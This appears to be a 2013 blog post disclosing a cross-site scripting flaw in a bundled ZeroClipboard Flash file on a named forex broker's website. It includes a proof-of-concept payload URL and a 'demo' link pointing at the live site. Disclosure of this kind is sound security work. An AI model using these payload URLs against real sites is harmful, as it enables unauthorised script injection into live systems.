secure.instaforex.com <== XSS

##################################################
# Description : secure.instaforex.com <== XSS
# Version : -
# Date : 7/8/2013
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################

Vulnerabilities in the secure.instaforex.com website,
which can be exploited by malicious people to conduct cross-site scripting attacks.
The vulnerabilities are caused due to a bundled vulnerable version of ZeroClipboard.
Cross-Site Scripting vulnerabilities in ZeroClipboard(http://seclists.org/fulldisclosure/2013/Feb/103)
and in multiple web applications.

Affected vendors / author:
https://secure.instaforex.com

Details:
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into clipboard

POC:
https://site/id/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height

Demo:
https://secure.instaforex.com/id/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height

Provided and/or discovered by:
Ryuzaki Lawlet / Fahmi Fisal @justryuz

Pages

secure.instaforex.com <== XSS

Belum ada tanggapan untuk "secure.instaforex.com <== XSS"

Post a Comment

secure.instaforex.com <== XSS

Postingan terkait:

Belum ada tanggapan untuk "secure.instaforex.com <== XSS"

Post a Comment